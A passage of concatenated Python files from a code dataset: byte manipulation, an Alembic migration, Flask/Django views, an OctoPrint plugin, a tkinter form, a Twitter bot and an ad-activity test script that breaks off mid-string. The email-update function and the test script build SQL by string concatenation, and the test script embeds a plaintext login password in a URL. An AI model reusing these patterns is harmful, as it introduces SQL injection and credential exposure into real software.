print(u'获得字节数据:', b_data)\r\n b2int = struct.unpack('B', b_data)[0]\r\n\r\n print(u'获得转换后的整型数据', b2int)\r\n\r\n re = ~b2int\r\n\r\n print(u'取反后的数据', re)\r\n\r\n if re < 0:\r\n int2b = struct.pack('i', re)\r\n else:\r\n int2b = struct.pack('I',re)\r\n print(u'转换成字节类型:', int2b)\r\n\r\n print(u'取反后的字节数据:', struct.pack('b', int2b[0]))\r\n return struct.pack('b', int2b[0])\r\n\r\nprint(revers_bytes(b'\\xf0'))","sub_path":"messy/python_basic/数据处理/操作二进制数据/字节取反.py","file_name":"字节取反.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9421453","text":"\"\"\"create role table\n\nRevision ID: 8f2475c20488\nRevises: a669f2bc2a57\nCreate Date: 2019-05-18 12:35:08.928551\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"8f2475c20488\"\ndown_revision = \"a669f2bc2a57\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"role\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"name\", sa.String(20), nullable=False),\n sa.Column(\"permissions\", sa.JSON, nullable=False)\n )\n\n\ndef downgrade():\n op.drop_table(\"role\")\n","sub_path":"gem/apps/gem/alembic/versions/2019-05-18_8f2475c20488_create_role_table.py","file_name":"2019-05-18_8f2475c20488_create_role_table.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25074835","text":"#changes a user's email in the db- Coded by Carolyne\nimport psycopg2\nfrom flask import Flask, flash\nfrom config import config\n\ndef change_email(email, old_email):\n conn = None\n curr_user = None\n try:\n # read connection parameters from database.ini\n params = config()\n # connect to the PostgreSQL server\n print('Connecting to the %s database...' 
% (params['database']))\n conn = psycopg2.connect(**params)\n print('Connected.')\n \n # create a cursor\n cur = conn.cursor()\n cur.execute(\"UPDATE USR SET USR_EMAIL = '\" + email + \"' WHERE USR_EMAIL = '\" + old_email + \"'\")\n try:\n conn.commit()\n except psycopg2.Error as e:\n t_message = \"Database error: \" + e + \"/n SQL: \" + s\n print(t_message)\n return\n \n # close the communication with the PostgreSQL\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n # return the query result\n return\n","sub_path":"src/app/edit_email.py","file_name":"edit_email.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583372226","text":"#\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# coding=utf-8\n\nfrom __future__ import absolute_import\nimport re\n\nimport octoprint.plugin\nimport RPi.GPIO as GPIO\n\nclass LEDStripControlPlugin(octoprint.plugin.AssetPlugin,\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.ShutdownPlugin,\n octoprint.plugin.StartupPlugin,\n octoprint.plugin.TemplatePlugin):\n\n\tdef __init__(self):\n\t\tself._leds = dict(r=None, g=None, b=None)\n\n\tdef _setup_pin(self, pin):\n\t\tself._logger.debug(u\"_setup_pin(%s)\" % (pin,))\n\t\tif pin:\n\t\t\tp = None\n\t\t\tGPIO.setwarnings(False)\n\t\t\tGPIO.setmode(GPIO.BOARD)\n\t\t\tGPIO.setup(pin, GPIO.OUT)\n\t\t\tGPIO.output(pin, GPIO.HIGH)\n\t\t\tp = GPIO.PWM(pin, 100)\n\t\t\tp.start(100)\n\t\t\treturn p\n\n\tdef _unregister_leds(self):\n\t\tself._logger.debug(u\"_unregister_leds()\")\n\t\tfor i in ('r', 'g', 'b'):\n\t\t\tif self._leds[i]:\n\t\t\t\tself._leds[i].ChangeDutyCycle(0)\n\t\t\t\tself._leds[i].stop()\n\t\t\t\t\n\t\tGPIO.cleanup()\n\t\tself._leds = dict(r=None, g=None, b=None)\n\n\tdef _register_leds(self):\n\t\tself._logger.debug(u\"_register_leds()\")\n\t\tfor i in ('r', 'g', 'b'):\n\t\t\ttry:\n\t\t\t\tpin = self._settings.get_int([i])\n\t\t\t\tself._logger.debug(u\"got pin(%s)\" % (pin,))\n\t\t\t\tself._leds[i] = self._setup_pin(pin)\n\t\t\texcept(AttributeError, ValueError) as e:\n\t\t\t\tself._logger.error(e)\n\n\tdef on_after_startup(self):\n\t\tself._logger.debug(u\"LEDStripControl Startup\")\n\t\tself._logger.debug(u\"RPi.GPIO version %s\" % (GPIO.VERSION,))\n\n\tdef on_shutdown(self):\n\t\tself._logger.debug(u\"LEDStripControl Shutdown\")\n\t\tself._unregister_leds()\n\n\tdef HandleM150(self, comm_instance, phase, cmd, cmd_type, gcode, *args, **kwargs):\n\t\tif gcode and cmd.startswith(\"M150\"):\n\t\t\tself._logger.debug(u\"M150 Detected: %s\" % (cmd,))\n\t\t\t# Emulating Marlin 1.1.0's syntax\n # https://github.com/MarlinFirmware/Marlin/blob/RC/Marlin/Marlin_main.cpp#L6133\n\t\t\tdutycycles = {'r':0.0, 'g':0.0, 'b':0.0}\n\t\t\tfor match in re.finditer(r'([RGUBrgub]) *(\\d*)', cmd):\n\t\t\t\tk = match.group(1).lower()\n\t\t\t\t# Marlin uses RUB instead 
of RGB\n\t\t\t\tif k == 'u': k = 'g'\n\t\t\t\ttry:\n\t\t\t\t\tv = float(match.group(2))\n\t\t\t\texcept ValueError:\n\t\t\t\t\t# more than likely match.group(2) was unspecified\n\t\t\t\t\tv = 255.0\n\t\t\t\tv = v/255.0 * 100.0 # convert RGB to RPi dutycycle\n\t\t\t\tv = max(min(v, 100.0), 0.0) # clamp the value\n\t\t\t\tdutycycles[k] = v\n\t\t\t\tself._logger.debug(u\"match 1: %s 2: %s\" % (k, v))\n\t\t\tfor l in dutycycles.keys():\n\t\t\t\tself._leds[l].ChangeDutyCycle(dutycycles[l])\n\t\t\t\t\n\t##~~ SettingsPlugin mixin\n\n\tdef get_settings_version(self):\n\t\treturn 1\n\n\tdef get_template_configs(self):\n\t\treturn [\n\t\t\tdict(type=\"settings\", name=\"LED Strip Control\", custom_bindings=False)\n\t\t]\n\n\tdef get_settings_defaults(self):\n\t\treturn dict(r=None, g=None, b=None)\n\n\tdef on_settings_initialized(self):\n\t\tself._logger.debug(u\"LEDStripControl on_settings_load()\")\n\t\tself._register_leds()\n\n\tdef on_settings_save(self, data):\n\t\tself._logger.debug(u\"LEDStripControl on_settings_save()\")\n\t\tself._unregister_leds()\n\t\toctoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n\t\tself._register_leds()\n\n\n\t##~~ Softwareupdate hook\n\n\tdef get_update_information(self):\n\t\treturn dict(\n\t\t\tledstripcontrol=dict(\n\t\t\t\tdisplayName=\"LED Strip Control Plugin\",\n\t\t\t\tdisplayVersion=self._plugin_version,\n\n\t\t\t\t# version check: github repository\n\t\t\t\ttype=\"github_release\",\n\t\t\t\tuser=\"google\",\n\t\t\t\trepo=\"OctoPrint-LEDStripControl\",\n\t\t\t\tcurrent=self._plugin_version,\n\n\t\t\t\t# update method: pip\n\t\t\t\tpip=\"https://github.com/google/OctoPrint-LEDStripControl/archive/{target_version}.zip\"\n\t\t\t)\n\t\t)\n\n__plugin_name__ = \"LED Strip Control\"\n\ndef __plugin_load__():\n\tglobal __plugin_implementation__\n\t__plugin_implementation__ = LEDStripControlPlugin()\n\n\tglobal __plugin_hooks__\n\t__plugin_hooks__ = {\n\t\t\"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information,\n\t\t\"octoprint.comm.protocol.gcode.queuing\": __plugin_implementation__.HandleM150\n\t}\n\n","sub_path":"octoprint_LEDStripControl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482080503","text":"from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.conf import settings\n\nfrom mailchimp_marketing import Client\nfrom mailchimp_marketing.api_client import ApiClientError\n\napi_key = settings.MAILCHIMP_API_KEY\nserver = settings.MAILCHIMP_DATA_CENTER\nlist_id = settings.MAILCHIMP_EMAIL_LIST_ID\n\n# Create your views here.\ndef subscribe(email):\n\n mailchimp = Client()\n mailchimp.set_config({\n \"api_key\": api_key,\n \"server\": server,\n })\n\n member_info = {\n \"email_address\": email,\n \"status\": \"subscribed\",\n }\n\n try:\n response = mailchimp.lists.add_list_member(list_id, member_info)\n print(\"response: {}\".format(response))\n except ApiClientError as error:\n print(\"An exception occured: {}\".format(error.text))\n\n\ndef ComingSoon(request):\n\n if request.method == \"POST\":\n email = request.POST['email']\n print(email)\n subscribe(email)\n messages.success(request, \"Email received. 
Thank you!\")\n\n return render(request, 'index.html')\n","sub_path":"src/MeetNakama/ComingSoon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507292097","text":"import tkinter as tk\nfrom tkinter import ttk, font\n\nfrom src.connection.database import get_search_entities\n\n\nclass TitleWidget(ttk.Frame):\n def __init__(self, container, title_frame_number):\n super().__init__(container)\n\n self.font = font.Font(size=11)\n\n self.characters = ['None'] + get_search_entities('', 'Character')\n self.npcs = ['None'] + get_search_entities('', 'NPC')\n self.monsters = ['None'] + get_search_entities('', 'Monster')\n\n # --- Attributes ---\n self.title = 'Title ' + title_frame_number\n self.name = tk.StringVar()\n self.character = tk.StringVar(value=self.characters)\n self.npc = tk.StringVar(value=self.npcs)\n self.monster = tk.StringVar(value=self.monsters)\n\n # --- Widgets ---\n self.character_entry = tk.Listbox()\n self.npc_entry = tk.Listbox()\n self.monster_entry = tk.Listbox()\n self.requirements_entry = tk.Text()\n self.description_entry = tk.Text()\n\n # --- Frame ---\n item_widget_frame = ttk.Frame(self)\n item_widget_frame.grid(row=0, column=0, sticky=\"NSEW\")\n item_widget_frame.columnconfigure((0, 1), weight=1)\n\n self.create_widgets(item_widget_frame)\n\n for child in item_widget_frame.winfo_children():\n child.grid_configure(padx=5, pady=5)\n\n def create_widgets(self, container):\n # --- Title ---\n\n title_label = ttk.Label(\n container,\n text=self.title\n )\n title_label.grid(row=0, column=0, sticky=\"EW\")\n\n title_separator = ttk.Separator(\n container\n )\n title_separator.grid(row=1, column=0, columnspan=3, sticky=\"EW\")\n\n # --- Name ---\n\n name_label = ttk.Label(\n container,\n text=\"Name\"\n )\n name_label.grid(row=2, column=0, sticky=\"EW\")\n\n name_entry = ttk.Entry(\n container,\n textvariable=self.name,\n width=60\n )\n name_entry.grid(row=2, column=1, sticky=\"EW\")\n\n # --- User ---\n\n user_label = ttk.Label(\n container,\n text=\"User\"\n )\n user_label.grid(row=3, column=0, sticky=\"EW\")\n\n self.character_entry = tk.Listbox(\n container,\n listvariable=self.character,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.character_entry.grid(row=3, column=1, sticky=\"EW\")\n\n self.character_entry.select_set(0)\n\n character_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n character_scrollbar.config(command=self.character_entry.yview)\n character_scrollbar.grid(row=3, column=2, sticky=\"NS\")\n\n self.character_entry.config(yscrollcommand=character_scrollbar.set)\n\n # --- NPC ---\n\n self.npc_entry = tk.Listbox(\n container,\n listvariable=self.npc,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.npc_entry.grid(row=4, column=1, sticky=\"EW\")\n\n self.npc_entry.select_set(0)\n\n npc_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n npc_scrollbar.config(command=self.npc_entry.yview)\n npc_scrollbar.grid(row=4, column=2, sticky=\"NS\")\n\n self.npc_entry.config(yscrollcommand=npc_scrollbar.set)\n\n # --- Monster ---\n\n self.monster_entry = tk.Listbox(\n container,\n listvariable=self.monster,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n 
highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.monster_entry.grid(row=5, column=1, sticky=\"EW\")\n\n self.monster_entry.select_set(0)\n\n monster_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n monster_scrollbar.config(command=self.monster_entry.yview)\n monster_scrollbar.grid(row=5, column=2, sticky=\"NS\")\n\n self.monster_entry.config(yscrollcommand=monster_scrollbar.set)\n\n # --- Requirements ---\n\n requirements_label = ttk.Label(\n container,\n text=\"Requirements\"\n )\n requirements_label.grid(row=6, column=0, sticky=\"EW\")\n\n self.requirements_entry = tk.Text(\n container,\n width=1,\n height=5\n )\n self.requirements_entry.grid(row=6, column=1, sticky=\"EW\")\n\n requirements_scroll = ttk.Scrollbar(\n container,\n orient=\"vertical\",\n command=self.requirements_entry.yview\n )\n requirements_scroll.grid(row=6, column=2, sticky=\"ns\")\n\n self.requirements_entry[\"yscrollcommand\"] = requirements_scroll.set\n\n self.requirements_entry.insert(tk.END, 'None')\n\n # --- Description ---\n\n description_label = ttk.Label(\n container,\n text=\"Description\"\n )\n description_label.grid(row=7, column=0, sticky=\"EW\")\n\n self.description_entry = tk.Text(\n container,\n width=1,\n height=5\n )\n self.description_entry.grid(row=7, column=1, sticky=\"EW\")\n\n description_scroll = ttk.Scrollbar(\n container,\n orient=\"vertical\",\n command=self.description_entry.yview\n )\n description_scroll.grid(row=7, column=2, sticky=\"ns\")\n\n self.description_entry[\"yscrollcommand\"] = description_scroll.set\n\n self.description_entry.insert(tk.END, 'None')\n","sub_path":"dist/rpg/src/title/title_widget.py","file_name":"title_widget.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"575449489","text":"from vector import Vector\nfrom sphere import Sphere\nfrom plane import Plane\nfrom light import Light\nfrom scene import Scene\n\nentities = []\n\n# plane\nplane = Plane(-2)\nplane.ambi_color = Vector(1.0, 1.0, 1.0)\nplane.ambi_coeff = 0.2\nplane.diff_color = Vector(1.0, 1.0, 1.0)\nplane.diff_coeff = 1.0\nentities.append(plane)\n\n# sphere 1\nsphere1 = Sphere(Vector(-4, 0, -7), 1)\nsphere1.ambi_color = Vector(1.0, 0.0, 0.0)\nsphere1.ambi_coeff = 0.2\nsphere1.diff_color = Vector(1.0, 0.0, 0.0)\nsphere1.diff_coeff = 1.0\nentities.append(sphere1)\n\n# sphere 2\nsphere2 = Sphere(Vector(0, 0, -7), 2)\nsphere2.ambi_color = Vector(0.0, 1.0, 0.0)\nsphere2.ambi_coeff = 0.2\nsphere2.diff_color = Vector(0.0, 1.0, 0.0)\nsphere2.diff_coeff = 0.5\nsphere2.spec_coeff = 0.5\nsphere2.spec_power = 32.0\nentities.append(sphere2)\n\n# sphere 3\nsphere3 = Sphere(Vector(4, 0, -7), 1)\nsphere3.ambi_color = Vector(0.0, 0.0, 1.0)\nsphere3.ambi_coeff = 0.2\nsphere3.diff_color = Vector(0.0, 0.0, 1.0)\nsphere3.diff_coeff = 1.0\nentities.append(sphere3)\n\nlights = []\n\n# light 1\nlight1 = Light(Vector(-4, 4, -3))\nlights.append(light1)\n\nscene = Scene(entities, lights)\n","sub_path":"raytracer/default_scene.py","file_name":"default_scene.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567006166","text":"import tweepy\nimport os\nimport time\nimport random\n\n\nimport json\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\napi_key = os.environ['GOOGLE_KEY']\nCONSUMER_KEY = os.environ['CONSUMER_KEY']\nCONSUMER_SECRET = 
os.environ['CONSUMER_SECRET']\nACCESS_TOKEN = os.environ['ACCESS_TOKEN']\nACCESS_SECRET = os.environ['ACCESS_SECRET']\n\nFILE = 'lastuser.txt'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\ndef main(userQuery):\n factCheckService = build(\"factchecktools\", \"v1alpha1\", developerKey=api_key)\n request = factCheckService.claims().search(query=userQuery, reviewPublisherSiteFilter = None)\n response = request.execute()\n reply = getAllRatings(response)\n return reply\n\ndef getRating(claim):\n review = claim[\"claimReview\"][0]\n rating = \"\"\n\n if \"textualRating\" in review:\n rating = review[\"textualRating\"]\n return rating\n\ndef getAllRatings(res):\n i = 0\n if \"claims\" in res.keys() and len(res[\"claims\"]) > 0:\n for claim in res['claims']:\n rating = getRating(claim)\n if 'false' in rating.lower():\n i += 1\n return i/len(res['claims'])\n return 0\n\ndef get():\n f = open(FILE, 'r')\n id = f.read().strip()\n if id:\n id = int(id)\n f.close()\n return id\ndef store(num):\n f = open(FILE, 'w')\n f.write(str(num))\n f.close()\ndef reply():\n last = get()\n if last:\n mentions = api.mentions_timeline(last, tweet_mode='extended')\n else:\n mentions = api.mentions_timeline(tweet_mode='extended')\n for mention in reversed(mentions):\n rating = main(mention.full_text[11:])\n api.update_status('@' + mention.user.screen_name + \" \" + str(rating*100) + \"% trustworthy\", mention.id)\n last = mention.id\n store(last)\n\"\"\"\nwhile True:\n time.sleep(300)\n reply()\n\"\"\"\nreply()\n","sub_path":"vrar.py","file_name":"vrar.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610431777","text":"\"\"\"qfgp01site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom extra_apps import xadmin\nfrom django.urls import path, include\nfrom users import views\nfrom . 
import views as curr_views\n\napp_name = \"cbv\"\nurlpatterns = [\n path('serverList/', curr_views.ServerListView.as_view(), name=\"serverList\"),\n # path('serverList/', curr_views.ServerDListView.as_view(), name=\"serverList\"),\n\n path('serverList//',\n curr_views.ServerDListView.as_view(), name=\"serverList\"),\n path('serverNowList/', curr_views.ServerNowListView.as_view(),\n name=\"serverNowList\"),\n\n path('serverDList/',\n curr_views.ServerDListView.as_view(), name=\"serverDList\"),\n\n path('serverDetail//', curr_views.ServerDetailView.as_view(),\n name=\"serverDetail\")\n]\n\n# handler404='qfgp01site.views.page_not_found'\n","sub_path":"Blog/qfgp01site/cbv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200580199","text":"# -*- coding: utf-8 -*-\n\nfrom baseClass import TfParser\n\n\ndef tf_vec_normalization(vec, norm=\"l1_norm\"):\n if norm == \"l1_norm\":\n sumation = sum(vec)\n new_vec = [ele/sumation for ele in vec]\n else:\n print(\"Wrong Argument Provided !\")\n raise BaseException\n return new_vec\n\n\ndef cosine(vector_a, vector_b):\n def l2_norm(vector):\n norm_squared = 0\n for ele in vector:\n norm_squared += ele**2\n norm = norm_squared**0.5\n return norm\n\n l2_norm_a = l2_norm(vector_a)\n l2_norm_b = l2_norm(vector_b)\n dot_product = sum([vector_a[i]*vector_b[i] for i in range(len(vector_a))])\n cosine = dot_product/(l2_norm_a*l2_norm_b)\n return cosine\n\n\ndef tf_vector(content):\n parser = TfParser(content)\n return parser()[0], parser()[1]\n\n\ndef cal_similarity(file_a, file_b):\n vector_space_a, tf_a = tf_vector(file_a)\n vector_space_b, tf_b = tf_vector(file_b)\n vector_space = vector_space_a | vector_space_b\n vector_ele_pos_mapping = list(vector_space)\n vector_a = [0 for ele in range(len(vector_ele_pos_mapping))]\n vector_b = list(vector_a)\n for key in tf_a.keys():\n position = vector_ele_pos_mapping.index(key)\n vector_a[position] = tf_a[key]\n for key in tf_b.keys():\n position = vector_ele_pos_mapping.index(key)\n vector_b[position] = tf_b[key]\n cos = cosine(vector_a, vector_b)\n return cos\n\nif __name__ == \"__main__\":\n file_path = [r\"test_cosine/0\", r\"test_cosine/1\"]\n cal_similarity(file_path[0], file_path[1])\n","sub_path":"waffle/ml/mil/vector_util.py","file_name":"vector_util.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181364331","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2018/2/24 15:03\r\n# @Author : wanglanqing\r\n\r\nimport requests\r\nimport sys\r\nimport time, datetime\r\nfrom utils.db_info import *\r\n\r\n\r\nclass TemplateActCreation(object):\r\n def __init__(self, templateTypeName, act_name, award_num, adzoneId):\r\n '''\r\n :param templateTypeName:模板类型名称\r\n :param act_name: 活动名称\r\n :param award_num: 奖品数量,该参数由前台页面提供,分别为6和8\r\n :return:\r\n '''\r\n self.s = requests.session()\r\n self.s.get('http://api.admin.adhudong.com/login/login_in.htm?name=test&pwd=!Qq123456')\r\n self.templateTypeName = templateTypeName\r\n self.act_name = act_name\r\n self.award_num = award_num\r\n self.db = DbOperations()\r\n # self.adzone = 467\r\n self.appkey=\"https://display.adhudong.com/site_login_ijf.htm?app_key=\"\r\n self.adzoneId = adzoneId\r\n self.begin_time = str(datetime.date.today().strftime('%Y-%m-%d')) + ' 00:00:00'\r\n self.end_time = str((datetime.date.today() + 
datetime.timedelta(days=120)).strftime('%Y-%m-%d')) + ' 00:00:00'\r\n\r\n\r\n def get_actId(self):\r\n '''\r\n :return:返回act_id\r\n '''\r\n sql_act = \"select id from voyager.base_act_info where act_name='\" + self.act_name + \"'\"\r\n print(sql_act)\r\n re_act = self.db.execute_sql(sql_act)\r\n if len(re_act)!= 1:\r\n print('get_actId,有问题')\r\n else:\r\n act_id = int(re_act[0][0])\r\n return act_id\r\n def get_awards_count(self):\r\n sql_ac= \" select count(*) from voyager.act_award where act_id=\" + str(self.get_actId())\r\n re_ac = self.db.execute_sql(sql_ac)\r\n return int(re_ac[0][0])\r\n\r\n def get_templateTypeId(self):\r\n '''\r\n 通过全局参数templateTypeName,获得templateTypeId\r\n :return:返回templateTypeId\r\n '''\r\n sql_ttpye = \"select id from voyager.template_type where name='\" + self.templateTypeName + \"'\"\r\n print(sql_ttpye)\r\n re_ttpye = self.db.execute_sql(sql_ttpye)\r\n if len(re_ttpye) != 1:\r\n print('get_templateTypeId , 名称有问题')\r\n else:\r\n templateTypeId = int(re_ttpye[0][0])\r\n return templateTypeId\r\n\r\n def get_templateId(self):\r\n '''\r\n :return:返回templateId\r\n '''\r\n templateTypeId=str(self.get_templateTypeId())\r\n sql_ttid = \"select id from voyager.base_template_info where template_type_id=\" + templateTypeId\r\n print(sql_ttid)\r\n re_ttid = self.db.execute_sql(sql_ttid)\r\n print('&&&***^')\r\n print(re_ttid)\r\n if len(re_ttid) != 1:\r\n print('get_templateId, 有问题')\r\n else:\r\n templateId = int(re_ttid[0][0])\r\n return templateId\r\n\r\n def create_template_type(self, locationAdress, preview=\"https://img0.adhudong.com/template/201802/24/999337a35a1a9169450685cc66560a05.png\",classifi=1):\r\n '''\r\n name:模板类型名称\r\n classifi: 模板分类,抽奖(1)、签到(2)、聚合页(3),\r\n prizesNum: 要求奖品数量,\r\n locationAdress: 代码地址,\r\n preview: 模板预览图\r\n '''\r\n json_body = {\r\n 'name': self.templateTypeName,\r\n 'classifi': classifi,\r\n 'prizesNum': self.award_num,\r\n 'locationAdress': locationAdress,\r\n 'preview': preview\r\n }\r\n post_url = \"http://api.admin.adhudong.com/template/typeInsert.htm\"\r\n re = self.s.post(post_url, data=json_body)\r\n print(sys.argv[0], re)\r\n return re\r\n # print(re.json()['code'])\r\n # if re.json()['code'] == 200:\r\n # return ('200')\r\n # else:\r\n # # try:\r\n # # return myException('create_template_type, 失败了')\r\n # return ('300')\r\n # # except Exception as e:\r\n # # return e\r\n\r\n\r\n def create_template(self,templateName, templateStyleUrl, template_conf_items=None):\r\n '''\r\n :param templateName,模板名称\r\n :param templateStyleUrl, 模板样式地址,css\r\n :param positionId ,坑位\r\n :template_conf_items, 默认为空,接收前台传入的参数\r\n '''\r\n templateTypeId=self.get_templateTypeId()\r\n post_url =\"http://api.admin.adhudong.com/template/modefy.htm\"\r\n json_body = {\r\n \"positionId\": '1',\r\n \"templateTypeId\": templateTypeId,\r\n \"templateName\": templateName,\r\n \"templateStyleUrl\" : templateStyleUrl,\r\n \"templateStyleImage\" : \"https://img3.adhudong.com/template/201802/25/2c6f4700db7982447348db4d0960e3ad.png\",\r\n \"remark\":template_conf_items,\r\n \"supportPop\":1,\r\n \"supportVideo\":1,\r\n 
\"positionJson\":'[{\"position_name\":\"活动抽奖弹窗\",\"pic_vedio\":\"1,2\",\"id\":1,\"selected\":true,\"key\":1},{\"position_name\":\"天降广告弹窗\",\"pic_vedio\":\"1\",\"id\":2,\"selected\":true,\"key\":2},{\"position_name\":\"强推\",\"pic_vedio\":\"1\",\"id\":4,\"selected\":true,\"key\":4},{\"position_name\":\"内部推广抽奖活动零钱位置\",\"pic_vedio\":\"1\",\"id\":6,\"selected\":true,\"key\":6},{\"position_name\":\"视频1_我的奖品\",\"pic_vedio\":\"2,3\",\"id\":27,\"selected\":true,\"key\":27}]'\r\n }\r\n re = self.s.post(post_url, data=json_body)\r\n\r\n print(sys.argv[0], re)\r\n return re\r\n # if re.json()['code'] == 200:\r\n # return ('create_template, 成功了')\r\n # else:\r\n # try:\r\n # # raise myException('create_template, 失败了')\r\n # raise SystemExit\r\n # except Exception as e:\r\n # return e.message\r\n\r\n def create_act(self, free_num):\r\n '''\r\n\r\n '''\r\n #创建活动sql, act_name,award_num,free_num,template_id\r\n template_id=self.get_templateId()\r\n print('=================================' + str(template_id))\r\n time.sleep(10)\r\n post_url = \"http://api.admin.adhudong.com/act/modefy.htm\"\r\n json_body = {\r\n \"status\": 1,\r\n \"awardNum\": 3,\r\n \"expand1\": 2,\r\n \"expand2\":2,\r\n \"expand8\":'2019-08-09 00:00:00',\r\n \"changeTimes\": 2,\r\n \"bannerImageUrl\": \"https://img3.adhudong.com/award/201802/25/9867c921ca0178820b8a37c677876223.jpg\",\r\n \"actRuleInfo\": \"
参与活动即有机会获得大奖。活动为概率中奖,奖品数量有限,祝君好运。 惊喜一:1000元现金 惊喜二:500元现金 惊喜三:200元现金 惊喜四:100元现金 惊喜五:50元现金 惊喜六:幸运奖 重要声明: 1、实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待 2、卡券类奖品使用规则详见卡券介绍页 3、通过非法途径获得奖品的,主办方有权不提供奖品
\",\r\n \"isPopupAd\":\"1\",\r\n \"popupTemplateId\":\"17\",\r\n \"isRelevance\":\"1\",\r\n \"customAct\":\"0\",\r\n \"actStyleId\":\"109\"\r\n }\r\n json_body['actName'] = self.act_name\r\n json_body['templateId'] = template_id\r\n json_body['freeNum'] = free_num\r\n re = self.s.post(post_url, data =json_body)\r\n return re\r\n # act_sql=\"\"\"\r\n # INSERT INTO voyager.base_act_info (act_type,act_name,banner_image_url,cover_image_url,award_num,free_num,begin_time,end_time,act_rule_info,`STATUS`,update_time,create_time,template_id,expand1,expand2,expand3,expand4,expand5,expand6,expand7,expand8,expand9,change_times\r\n # )VALUES(1,{0},'https://img4.adhudong.com/award/201802/22/089c376e9519c85ab8ce5fced7c9ea49.jpg',\r\n # NULL,{1},{2},NULL,NULL,\r\n # '
参与活动即有机会获得大奖。活动为概率中奖,奖品数量有限,祝君好运。 惊喜一:1000元现金 惊喜二:500元现金 惊喜三:200元现金 惊喜四:100元现金 惊喜五:50元现金 惊喜六:幸运奖 重要声明: 1、实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待 2、卡券类奖品使用规则详见卡券介绍页 3、通过非法途径获得奖品的,主办方有权不提供奖品1
',\r\n # 1,now(),now(),{3},1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\r\n # );\"\"\".format(\"'\"+self.act_name+\"'\", self.award_num, free_num, templateId)\r\n # print(act_sql)\r\n # try:\r\n # self.db.execute_sql(act_sql)\r\n # self.db.mycommit()\r\n # if self.get_actId():\r\n # return ('create_act,成功了')\r\n # else:\r\n # try:\r\n # raise myException('create_act, 失败了')\r\n # except Exception as e:\r\n # return e.message\r\n # except:\r\n # self.db.myrollback()\r\n\r\n\r\n def create_awards(self):\r\n act_id = str(self.get_actId())\r\n # act_id = str(self.get_actId('淘粉吧转盘0228'))\r\n #创建奖品的sql\r\n award_ths = ''',0,15,1,now(),now(),'谢谢参与','https://img0.adhudong.com/association/201802/22/10bf5888ea77ea198db1dbadc663b05f.jpg',\r\n 6,NULL,NULL,NULL,'
